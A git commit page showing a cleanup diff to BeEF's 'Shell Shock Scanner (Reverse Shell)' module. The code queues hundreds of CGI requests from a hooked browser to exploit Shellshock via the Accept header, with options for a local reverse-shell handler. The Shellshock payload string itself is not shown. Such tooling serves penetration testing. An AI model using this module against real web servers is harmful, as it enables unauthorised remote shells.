Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Module clean up

Browse Source
This commit is contained in:
Brendan Coles
2015-01-06 10:27:10 +00:00
parent a9833fd538
commit 8a8ea35265
3 changed files with 8 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/shell_shock_scanner/command.js
View File

@@ -13,7 +13,6 @@ beef.execute(function() {
var target = rproto + '://' + rhost + ':' + rport;
var method = '<%= @method %>';
var wait = '<%= @wait %>';
var timeout = '<%= @timeout %>';
get_cgi = function(uri) {
try {
@@ -34,7 +33,8 @@ beef.execute(function() {
}
}
var scripts = new Array(
// add scripts to queue
var requests = new Array(
<%=
scripts = []
File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
@@ -49,12 +49,10 @@ beef.execute(function() {
%>
);
// add scripts to queue
var requests = [];
for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
// process queue
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
beef.debug("[command #<%= @command_id %>] Starting Shellshock scan of "+target+" ("+requests.length+" URLs)");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");
var timeout = wait * requests.length + 10;
var handle = setInterval(function() {
if (requests.length > 0) {
get_cgi(requests.pop());
@@ -64,7 +62,7 @@ beef.execute(function() {
// clean up
cleanup = function() {
if (handle) {
beef.debug("Killing timer [ID: " + handle + "]");
beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
clearInterval(handle);
handle = 0;
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");

2
modules/exploits/shell_shock_scanner/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Exploits"
name: "Shell Shock Scanner (Reverse Shell)"
description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>."
description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>.<br/><br/>The scan will take about 2 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
authors: ["Stephane Chazelas", "mz", "bmantra", "radoen", "bcoles"]
target:
working: ["ALL"]

3
modules/exploits/shell_shock_scanner/module.rb
View File

@@ -30,8 +30,7 @@ class Shell_shock_scanner < BeEF::Core::Command
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' },
{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
{ 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' }
]
end